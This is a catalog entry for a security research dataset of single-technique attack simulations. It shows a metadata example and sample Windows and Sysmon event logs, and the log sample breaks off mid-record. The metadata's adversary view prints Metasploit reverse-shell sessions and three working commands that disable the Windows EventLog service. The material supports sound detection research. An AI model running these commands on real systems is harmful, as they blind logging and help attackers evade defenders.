Network Data Source | pcaps, AWS CloudTrail |
Network Data Labeled | “Yes”, in the sense that only attack traffic is provided |
Host Data Source | Windows events, linux auditd |
Host Data Labeled | “Yes”, in the sense that only attack events are provided |
Overall Setting | Single OS |
OS Types | Windows Linux |
Number of Machines | n/a |
Total Runtime | n/a |
Year of Collection | 2019-2022 |
Attack Categories | Most of MITRE’s Att&ck matrix |
Benign Activity | None |
Packed Size | 125 MB |
Unpacked Size | n/a |
Download Link | goto |
Overview
This is a subset of the Security Datasets Collection focusing on small datasets, each originating from a single attack associated with a certain MITRE tactic and technique. Due to their small granularity, all of these have been combined into a single entry here in this database.
Environment
Details are provided per attack, though not all attacks provide the same amount of information.
Activity
Details are provided per attack, though not all attacks provide the same amount of information.
Contained Data
Content obviously differs between scenarios, and is generally divided into Windows, Linux, and AWS, though the vast majority of data stems from Windows simulations. For each of these groups, datasets are further divided depending on their corresponding tactic (execution, defense evasion, etc.). Finally, for each simulation, the following files exist
- A
yml
metadata file containing various information like attack and setup description - Host and/or network log files, depending on scenario
- Host logs come in the form of Windows events or linux audit logs as
.json
or.log
, respectively - Network logs come in the form of packet captures or AWS CloudTrail logs as
.cap
or.json
, respectively
- Host logs come in the form of Windows events or linux audit logs as
It is not recommended to look through the metadata directly using the YAML file, the accompanying website picks this information up and displays it in a nicer way (see example data below). While the structure is consistent, the information that is actually presented is not - some for example describe the specific victim and attacker OS used, others just don’t. None go into detail regarding any labeling, presumably expecting all logs to be considered malicious.
Links
Data Examples
Metadata for the scenario “Stopping Event Log Service via Modification of Start Up Type” (
see webpage).
Taken from datasets/atomic/_metadata/SDWIN-220708104215.yaml
.
title: Stopping Event Log Service via Modification of Start Up Type
id: SDWIN-220708104215
contributors:
- Jose Rodriguez @Cyb3rPandaH
creation_date: 2022/07/08
modification_date: 2022/08/04
platform:
- Windows
type: atomic
tags:
- powershell
- reg
- cmd
- eventlog
description: After getting a shell with elevated privileges on the target, we modified the start up type for the EventLog service to `Disabled`. After the modification, we need to restart our system to make the EventLog service unavailable (Disabled). This data set contains only before-reboot data of our simulation. Even though after-reboot data is not part of the dataset, our attempt to disable the EventLog service was successful during the simulation. We have simulated this attack using 3 different procedures REG command via cmd.exe, REG meterpreter command (Metasploit), and the PowerShell module (Metasploit). This dataset was generated using a Windows 10 Pro Evaluation edition (Version:1903,OS Build:18362.30) and Kali Linux (Version:2022.2).
attack_mappings:
- technique: T1562
sub-technique: "002"
tactics:
- TA0005
notebooks:
files:
- type: Host
link: https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_disable_eventlog_service_startuptype_modification.zip
- type: Host
link: https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_disable_eventlog_service_startuptype_modification_via_registry.zip
- type: Host
link: https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_disable_eventlog_service_startuptype_modification_via_registry.zip
simulation:
environment: Lab VM
tools:
- type: Manual
name: cmd
module: cmd
script: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmd
- type: Manual
name: Metasploit
module: reg
script: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/base/sessions/command_shell.rb
- type: Manual
name: Metasploit
module: powershell
script: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/windows/powershell.rb
permissions_required:
- Administrator
adversary_view: |-
**** Using reg command via cmd.exe:
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: jhdxsqpv) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 20 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-04 11:20:26 -0400
meterpreter > shell
Process 7728 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18362.30]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\IT01-Pedro\Downloads>REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog /t REG_DWORD /v Start /d 4
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog /t REG_DWORD /v Start /d 4
Value Start exists, overwrite(Yes/No)? yes
The operation completed successfully.
C:\Users\IT01-Pedro\Downloads>
**** Using reg meterpreter command:
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: r64afjpx) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 19 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-04 10:50:58 -0400
meterpreter > reg setval -k 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog' -v 'Start' -t 'REG_DWORD' -d 4
Successfully set Start of REG_DWORD.
meterpreter >
**** Using PowerShell module:
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: bgwdtwdi) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 21 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-04 11:36:38 -0400
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_execute "Set-Service -Name EventLog -StartUpType Disabled"
[+] Command execution completed:
meterpreter >
references:
- https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2
- https://www.offensive-security.com/metasploit-unleashed/interacting-registry/
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg
Snippet of Windows event logs corresponding to the entry above, taken
from datasets/atomic/windows/defense_evasion/host /psh_disable_eventlog_service_startuptype_modification.json
.
{
"SourceName": "Microsoft-Windows-Security-Auditing",
"ProviderGuid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
"Level": "0",
"Keywords": "0x8020000000000000",
"Channel": "Security",
"Hostname": "Pedro01",
"TimeCreated": "2022-08-04T08:37:04.983Z",
"@timestamp": "2022-08-04T08:37:04.983Z",
"EventID": 4663,
"Message": "An attempt was made to access an object.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nObject:\r\n\tObject Server:\t\tSecurity\r\n\tObject Type:\t\tKey\r\n\tObject Name:\t\t\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\WMI\\Autologger\\EventLog-Application\\{2a45d52e-bbf3-4843-8e18-b356ed5f6a65}\r\n\tHandle ID:\t\t0x274\r\n\tResource Attributes:\t-\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x4c4\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nAccess Request Information:\r\n\tAccesses:\t\tSet key value\r\n\t\t\t\t\r\n\tAccess Mask:\t\t0x2",
"Task": "12801",
"SubjectUserSid": "S-1-5-19",
"SubjectUserName": "LOCAL SERVICE",
"SubjectDomainName": "NT AUTHORITY",
"SubjectLogonId": "0x3e5",
"ObjectServer": "Security",
"ObjectType": "Key",
"ObjectName": "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\WMI\\Autologger\\EventLog-Application\\{2a45d52e-bbf3-4843-8e18-b356ed5f6a65}",
"HandleId": "0x274",
"AccessList": "%%4433\n\t\t\t\t",
"AccessMask": "0x2",
"ProcessId": "0x4c4",
"ProcessName": "C:\\Windows\\System32\\svchost.exe",
"ResourceAttributes": "-"
}
{
"SourceName": "Microsoft-Windows-Security-Auditing",
"ProviderGuid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
"Level": "0",
"Keywords": "0x8020000000000000",
"Channel": "Security",
"Hostname": "Pedro01",
"TimeCreated": "2022-08-04T08:37:04.984Z",
"@timestamp": "2022-08-04T08:37:04.984Z",
"EventID": 4658,
"Message": "The handle to an object was closed.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nObject:\r\n\tObject Server:\t\tSecurity\r\n\tHandle ID:\t\t0x274\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x4c4\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe",
"Task": "12801",
"SubjectUserSid": "S-1-5-19",
"SubjectUserName": "LOCAL SERVICE",
"SubjectDomainName": "NT AUTHORITY",
"SubjectLogonId": "0x3e5",
"ObjectServer": "Security",
"HandleId": "0x274",
"ProcessId": "0x4c4",
"ProcessName": "C:\\Windows\\System32\\svchost.exe"
}
{
"SourceName": "Microsoft-Windows-Security-Auditing",
"ProviderGuid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
"Level": "0",
"Keywords": "0x8020000000000000",
"Channel": "Security",
"Hostname": "Pedro01",
"TimeCreated": "2022-08-04T08:37:05.006Z",
"@timestamp": "2022-08-04T08:37:05.006Z",
"EventID": 4690,
"Message": "An attempt was made to duplicate a handle to an object.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nSource Handle Information:\r\n\tSource Handle ID:\t0x274\r\n\tSource Process ID:\t0x4c4\r\n\r\nNew Handle Information:\r\n\tTarget Handle ID:\t0x35b8\r\n\tTarget Process ID:\t0x4",
"Task": "12807",
"SubjectUserSid": "S-1-5-19",
"SubjectUserName": "LOCAL SERVICE",
"SubjectDomainName": "NT AUTHORITY",
"SubjectLogonId": "0x3e5",
"SourceHandleId": "0x274",
"SourceProcessId": "0x4c4",
"TargetHandleId": "0x35b8",
"TargetProcessId": "0x4"
}
{
"SourceName": "Microsoft-Windows-Security-Auditing",
"ProviderGuid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
"Level": "0",
"Keywords": "0x8020000000000000",
"Channel": "Security",
"Hostname": "Pedro01",
"TimeCreated": "2022-08-04T08:37:05.006Z",
"@timestamp": "2022-08-04T08:37:05.006Z",
"EventID": 4658,
"Message": "The handle to an object was closed.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nObject:\r\n\tObject Server:\t\tSecurity\r\n\tHandle ID:\t\t0x35b8\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x4c4\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe",
"Task": "12801",
"SubjectUserSid": "S-1-5-19",
"SubjectUserName": "LOCAL SERVICE",
"SubjectDomainName": "NT AUTHORITY",
"SubjectLogonId": "0x3e5",
"ObjectServer": "Security",
"HandleId": "0x35b8",
"ProcessId": "0x4c4",
"ProcessName": "C:\\Windows\\System32\\svchost.exe"
}
{
"SourceName": "Microsoft-Windows-Security-Auditing",
"ProviderGuid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
"Level": "0",
"Keywords": "0x8020000000000000",
"Channel": "Security",
"Hostname": "Pedro01",
"TimeCreated": "2022-08-04T08:37:05.006Z",
"@timestamp": "2022-08-04T08:37:05.006Z",
"EventID": 4656,
"Message": "A handle to an object was requested.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nObject:\r\n\tObject Server:\t\tSecurity\r\n\tObject Type:\t\tKey\r\n\tObject Name:\t\t\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\WMI\\Autologger\\EventLog-Application\r\n\tHandle ID:\t\t0x274\r\n\tResource Attributes:\t-\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x4c4\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nAccess Request Information:\r\n\tTransaction ID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\tAccesses:\t\tREAD_CONTROL\r\n\t\t\t\tQuery key value\r\n\t\t\t\tSet key value\r\n\t\t\t\tCreate sub-key\r\n\t\t\t\tEnumerate sub-keys\r\n\t\t\t\tNotify about changes to keys\r\n\t\t\t\t\r\n\tAccess Reasons:\t\t-\r\n\tAccess Mask:\t\t0x2001F\r\n\tPrivileges Used for Access Check:\t-\r\n\tRestricted SID Count:\t0",
"Task": "12801",
"SubjectUserSid": "S-1-5-19",
"SubjectUserName": "LOCAL SERVICE",
"SubjectDomainName": "NT AUTHORITY",
"SubjectLogonId": "0x3e5",
"ObjectServer": "Security",
"ObjectType": "Key",
"ObjectName": "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\WMI\\Autologger\\EventLog-Application",
"HandleId": "0x274",
"TransactionId": "{00000000-0000-0000-0000-000000000000}",
"AccessList": "%%1538\n\t\t\t\t%%4432\n\t\t\t\t%%4433\n\t\t\t\t%%4434\n\t\t\t\t%%4435\n\t\t\t\t%%4436\n\t\t\t\t",
"AccessReason": "-",
"AccessMask": "0x2001f",
"PrivilegeList": "-",
"RestrictedSidCount": "0",
"ProcessId": "0x4c4",
"ProcessName": "C:\\Windows\\System32\\svchost.exe",
"ResourceAttributes": "-"
}
{
"SourceName": "Microsoft-Windows-Security-Auditing",
"ProviderGuid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
"Level": "0",
"Keywords": "0x8020000000000000",
"Channel": "Security",
"Hostname": "Pedro01",
"TimeCreated": "2022-08-04T08:37:05.006Z",
"@timestamp": "2022-08-04T08:37:05.006Z",
"EventID": 4663,
"Message": "An attempt was made to access an object.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nObject:\r\n\tObject Server:\t\tSecurity\r\n\tObject Type:\t\tKey\r\n\tObject Name:\t\t\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\WMI\\Autologger\\EventLog-Application\r\n\tHandle ID:\t\t0x274\r\n\tResource Attributes:\t-\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x4c4\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nAccess Request Information:\r\n\tAccesses:\t\tSet key value\r\n\t\t\t\t\r\n\tAccess Mask:\t\t0x2",
"Task": "12801",
"SubjectUserSid": "S-1-5-19",
"SubjectUserName": "LOCAL SERVICE",
"SubjectDomainName": "NT AUTHORITY",
"SubjectLogonId": "0x3e5",
"ObjectServer": "Security",
"ObjectType": "Key",
"ObjectName": "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\WMI\\Autologger\\EventLog-Application",
"HandleId": "0x274",
"AccessList": "%%4433\n\t\t\t\t",
"AccessMask": "0x2",
"ProcessId": "0x4c4",
"ProcessName": "C:\\Windows\\System32\\svchost.exe",
"ResourceAttributes": "-"
}
{
"SourceName": "Microsoft-Windows-Security-Auditing",
"ProviderGuid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
"Level": "0",
"Keywords": "0x8020000000000000",
"Channel": "Security",
"Hostname": "Pedro01",
"TimeCreated": "2022-08-04T08:37:05.008Z",
"@timestamp": "2022-08-04T08:37:05.008Z",
"EventID": 4658,
"Message": "The handle to an object was closed.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nObject:\r\n\tObject Server:\t\tSecurity\r\n\tHandle ID:\t\t0x274\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x4c4\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe",
"Task": "12801",
"SubjectUserSid": "S-1-5-19",
"SubjectUserName": "LOCAL SERVICE",
"SubjectDomainName": "NT AUTHORITY",
"SubjectLogonId": "0x3e5",
"ObjectServer": "Security",
"HandleId": "0x274",
"ProcessId": "0x4c4",
"ProcessName": "C:\\Windows\\System32\\svchost.exe"
}
{
"SourceName": "Microsoft-Windows-Security-Auditing",
"ProviderGuid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
"Level": "0",
"Keywords": "0x8020000000000000",
"Channel": "Security",
"Hostname": "Pedro01",
"TimeCreated": "2022-08-04T08:37:05.013Z",
"@timestamp": "2022-08-04T08:37:05.013Z",
"EventID": 4658,
"Message": "The handle to an object was closed.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nObject:\r\n\tObject Server:\t\tSecurity\r\n\tHandle ID:\t\t0xd30\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x4c4\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe",
"Task": "12801",
"SubjectUserSid": "S-1-5-19",
"SubjectUserName": "LOCAL SERVICE",
"SubjectDomainName": "NT AUTHORITY",
"SubjectLogonId": "0x3e5",
"ObjectServer": "Security",
"HandleId": "0xd30",
"ProcessId": "0x4c4",
"ProcessName": "C:\\Windows\\System32\\svchost.exe"
}
{
"SourceName": "Microsoft-Windows-Security-Auditing",
"ProviderGuid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
"Level": "0",
"Keywords": "0x8020000000000000",
"Channel": "Security",
"Hostname": "Pedro01",
"TimeCreated": "2022-08-04T08:37:11.530Z",
"@timestamp": "2022-08-04T08:37:11.530Z",
"EventID": 4689,
"Message": "A process has exited.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-968647429-258479840-2507984072-1002\r\n\tAccount Name:\t\tIT01-Pedro\r\n\tAccount Domain:\t\tPEDRO01\r\n\tLogon ID:\t\t0x3673C\r\n\r\nProcess Information:\r\n\tProcess ID:\t0xa1c\r\n\tProcess Name:\tC:\\Windows\\System32\\backgroundTaskHost.exe\r\n\tExit Status:\t0x1",
"Task": "13313",
"SubjectUserSid": "S-1-5-21-968647429-258479840-2507984072-1002",
"SubjectUserName": "IT01-Pedro",
"SubjectDomainName": "PEDRO01",
"SubjectLogonId": "0x3673c",
"Status": "0x1",
"ProcessId": "0xa1c",
"ProcessName": "C:\\Windows\\System32\\backgroundTaskHost.exe"
}
{
"SourceName": "Microsoft-Windows-Sysmon",
"ProviderGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"Level": "4",
"Keywords": "0x8000000000000000",
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Hostname": "Pedro01",
"TimeCreated": "2022-08-04T08:36:14.593Z",
"@timestamp": "2022-08-04T08:36:14.593Z",
"EventID": 26,
"Message": "File Delete logged:\r\nRuleName: -\r\nUtcTime: 2022-08-04 15:36:14.587\r\nProcessGuid: {625b42a0-4109-62e9-2600-000000000900}\r\nProcessId: 1408\r\nUser: NT AUTHORITY\\SYSTEM\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetFilename: C:\\Windows\\Prefetch\\SPPEXTCOMOBJ.EXE-BB03B3D6.pf\r\nHashes: SHA1=0E60B9DC43FD335F50E163573D8E700897184CC2,MD5=40F3175D55D34290D443EAD9F7BC763F,SHA256=717DB59D8D9F3606F839003A8B22750B80C39E4BF56E97D189839A34CEEDE49C,IMPHASH=00000000000000000000000000000000\r\nIsExecutable: false",
"Task": "26",
"RuleName": "-",
"UtcTime": "2022-08-04 15:36:14.587",
"ProcessGuid": "{625b42a0-4109-62e9-2600-000000000900}",
"ProcessId": "1408",
"User": "NT AUTHORITY\\SYSTEM",
"Image": "C:\\Windows\\system32\\svchost.exe",
"TargetFilename": "C:\\Windows\\Prefetch\\SPPEXTCOMOBJ.EXE-BB03B3D6.pf",
"Hashes": "SHA1=0E60B9DC43FD335F50E163573D8E700897184CC2,MD5=40F3175D55D34290D443EAD9F7BC763F,SHA256=717DB59D8D9F3606F839003A8B22750B80C39E4BF56E97D189839A34CEEDE49C,IMPHASH=00000000000000000000000000000000",
"IsExecutable": "false"
}
{
"SourceName": "Microsoft-Windows-Sysmon",
"ProviderGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"Level": "4",
"Keywords": "0x8000000000000000",
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Hostname": "Pedro01",
"TimeCreated": "2022-08-04T08:36:14.594Z",
"@timestamp": "2022-08-04T08:36:14.594Z",
"EventID": 11,
"Message": "File created:\r\nRuleName: -\r\nUtcTime: 2022-08-04 15:36:14.587\r\nProcessGuid: {625b42a0-4109-62e9-2600-000000000900}\r\nProcessId: 1408\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetFilename: C:\\Windows\\Prefetch\\SPPEXTCOMOBJ.EXE-BB03B3D6.pf\r\nCreationUtcTime: 2022-07-29 05:08:44.061\r\nUser: NT AUTHORITY\\SYSTEM",
"Task": "11",
"RuleName": "-",
"UtcTime": "2022-08-04 15:36:14.587",
"ProcessGuid": "{625b42a0-4109-62e9-2600-000000000900}",
"ProcessId": "1408",
"Image": "C:\\Windows\\system32\\svchost.exe",
"TargetFilename": "C:\\Windows\\Prefetch\\SPPEXTCOMOBJ.EXE-BB03B3D6.pf",
"CreationUtcTime": "2022-07-29 05:08:44.061",
"User": "NT AUTHORITY\\SYSTEM"
}
{
"SourceName": "Microsoft-Windows-Sysmon",
"ProviderGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"Level": "4",
"Keywords": "0x8000000000000000",
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Hostname": "Pedro01",
"TimeCreated": "2022-08-04T08:36:15.184Z",
"@timestamp": "2022-08-04T08:36:15.184Z",
"EventID": 10,
"Message": "Process accessed:\r\nRuleName: -\r\nUtcTime: 2022-08-04 15:36:15.091\r\nSourceProcessGUID: {625b42a0-6b35-62e9-1200-000000000900}\r\nSourceProcessId: 888\r\nSourceThreadId: 3696\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {625b42a0-4111-62e9-4600-000000000900}\r\nTargetProcessId: 2696\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9c524|C:\\Windows\\System32\\KERNELBASE.dll+6a685|c:\\windows\\system32\\lsm.dll+10225|C:\\Windows\\System32\\RPCRT4.dll+76963|C:\\Windows\\System32\\RPCRT4.dll+da036|C:\\Windows\\System32\\RPCRT4.dll+37a5c|C:\\Windows\\System32\\RPCRT4.dll+548d8|C:\\Windows\\System32\\RPCRT4.dll+2c931|C:\\Windows\\System32\\RPCRT4.dll+2c1eb|C:\\Windows\\System32\\RPCRT4.dll+1a86f|C:\\Windows\\System32\\RPCRT4.dll+19d1a|C:\\Windows\\System32\\RPCRT4.dll+19301|C:\\Windows\\System32\\RPCRT4.dll+18d6e|C:\\Windows\\System32\\RPCRT4.dll+169a5|C:\\Windows\\SYSTEM32\\ntdll.dll+333fd|C:\\Windows\\SYSTEM32\\ntdll.dll+34152|C:\\Windows\\System32\\KERNEL32.DLL+17944|C:\\Windows\\SYSTEM32\\ntdll.dll+6ce71\r\nSourceUser: NT AUTHORITY\\SYSTEM\r\nTargetUser: NT AUTHORITY\\LOCAL SERVICE",
"Task": "10",
"RuleName": "-",
"UtcTime": "2022-08-04 15:36:15.091",
"SourceProcessGUID": "{625b42a0-6b35-62e9-1200-000000000900}",
"SourceProcessId": "888",
"SourceThreadId": "3696",
"SourceImage": "C:\\Windows\\system32\\svchost.exe",
"TargetProcessGUID": "{625b42a0-4111-62e9-4600-000000000900}",
"TargetProcessId": "2696",
"TargetImage": "C:\\Windows\\System32\\svchost.exe",
"GrantedAccess": "0x1000",
"CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9c524|C:\\Windows\\System32\\KERNELBASE.dll+6a685|c:\\windows\\system32\\lsm.dll+10225|C:\\Windows\\System32\\RPCRT4.dll+76963|C:\\Windows\\System32\\RPCRT4.dll+da036|C:\\Windows\\System32\\RPCRT4.dll+37a5c|C:\\Windows\\System32\\RPCRT4.dll+548d8|C:\\Windows\\System32\\RPCRT4.dll+2c931|C:\\Windows\\System32\\RPCRT4.dll+2c1eb|C:\\Windows\\System32\\RPCRT4.dll+1a86f|C:\\Windows\\System32\\RPCRT4.dll+19d1a|C:\\Windows\\System32\\RPCRT4.dll+19301|C:\\Windows\\System32\\RPCRT4.dll+18d6e|C:\\Windows\\System32\\RPCRT4.dll+169a5|C:\\Windows\\SYSTEM32\\ntdll.dll+333fd|C:\\Windows\\SYSTEM32\\ntdll.dll+34152|C:\\Windows\\System32\\KERNEL32.DLL+17944|C:\\Windows\\SYSTEM32\\ntdll.dll+6ce71",
"SourceUser": "NT AUTHORITY\\SYSTEM",
"TargetUser": "NT AUTHORITY\\LOCAL SERVICE"
}
{
"SourceName": "Microsoft-Windows-Sysmon",
"ProviderGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"Level": "4",
"Keywords": "0x8000000000000000",
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Hostname": "Pedro01",
"TimeCreated": "2022-08-04T08:36:15.184Z",
"@timestamp": "2022-08-04T08:36:15.184Z",
"EventID": 10,
"Message": "Process accessed:\r\nRuleName: -\r\nUtcTime: 2022-08-04 15:36:15.091\r\nSourceProcessGUID: {625b42a0-6b35-62e9-1200-000000000900}\r\nSourceProcessId: 888\r\nSourceThreadId: 3696\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {625b42a0-4111-62e9-4600-000000000900}\r\nTargetProcessId: 2696\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9c524|C:\\Windows\\System32\\KERNELBASE.dll+6a685|c:\\windows\\system32\\lsm.dll+108a0|C:\\Windows\\System32\\RPCRT4.dll+76963|C:\\Windows\\System32\\RPCRT4.dll+da036|C:\\Windows\\System32\\RPCRT4.dll+37a5c|C:\\Windows\\System32\\RPCRT4.dll+548d8|C:\\Windows\\System32\\RPCRT4.dll+2c931|C:\\Windows\\System32\\RPCRT4.dll+2c1eb|C:\\Windows\\System32\\RPCRT4.dll+1a86f|C:\\Windows\\System32\\RPCRT4.dll+19d1a|C:\\Windows\\System32\\RPCRT4.dll+19301|C:\\Windows\\System32\\RPCRT4.dll+18d6e|C:\\Windows\\System32\\RPCRT4.dll+169a5|C:\\Windows\\SYSTEM32\\ntdll.dll+333fd|C:\\Windows\\SYSTEM32\\ntdll.dll+34152|C:\\Windows\\System32\\KERNEL32.DLL+17944|C:\\Windows\\SYSTEM32\\ntdll.dll+6ce71\r\nSourceUser: NT AUTHORITY\\SYSTEM\r\nTargetUser: NT AUTHORITY\\LOCAL SERVICE",
"Task": "10",
"RuleName": "-",
"UtcTime": "2022-08-04 15:36:15.091",
"SourceProcessGUID": "{625b42a0-6b35-62e9-1200-000000000900}",
"SourceProcessId": "888",
"SourceThreadId": "3696",
"SourceImage": "C:\\Windows\\system32\\svchost.exe",
"TargetProcessGUID": "{625b42a0-4111-62e9-4600-000000000900}",
"TargetProcessId": "2696",
"TargetImage": "C:\\Windows\\System32\\svchost.exe",
"GrantedAccess": "0x1000",
"CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9c524|C:\\Windows\\System32\\KERNELBASE.dll+6a685|c:\\windows\\system32\\lsm.dll+108a0|C:\\Windows\\System32\\RPCRT4.dll+76963|C:\\Windows\\System32\\RPCRT4.dll+da036|C:\\Windows\\System32\\RPCRT4.dll+37a5c|C:\\Windows\\System32\\RPCRT4.dll+548d8|C:\\Windows\\System32\\RPCRT4.dll+2c931|C:\\Windows\\System32\\RPCRT4.dll+2c1eb|C:\\Windows\\System32\\RPCRT4.dll+1a86f|C:\\Windows\\System32\\RPCRT4.dll+19d1a|C:\\Windows\\System32\\RPCRT4.dll+19301|C:\\Windows\\System32\\RPCRT4.dll+18d6e|C:\\Windows\\System32\\RPCRT4.dll+169a5|C:\\Windows\\SYSTEM32\\ntdll.dll+333fd|C:\\Windows\\SYSTEM32\\ntdll.dll+34152|C:\\Windows\\System32\\KERNEL32.DLL+17944|C:\\Windows\\SYSTEM32\\ntdll.dll+6ce71",
"SourceUser": "NT AUTHORITY\\SYSTEM",
"TargetUser": "NT AUTHORITY\\LOCAL SERVICE"
}
{
"SourceName": "Microsoft-Windows-Sysmon",
"ProviderGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"Level": "4",
"Keywords": "0x8000000000000000",
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Hostname": "Pedro01",
"TimeCreated": "2022-08-04T08:36:15.184Z",
"@timestamp": "2022-08-04T08:36:15.184Z",
"EventID": 10,
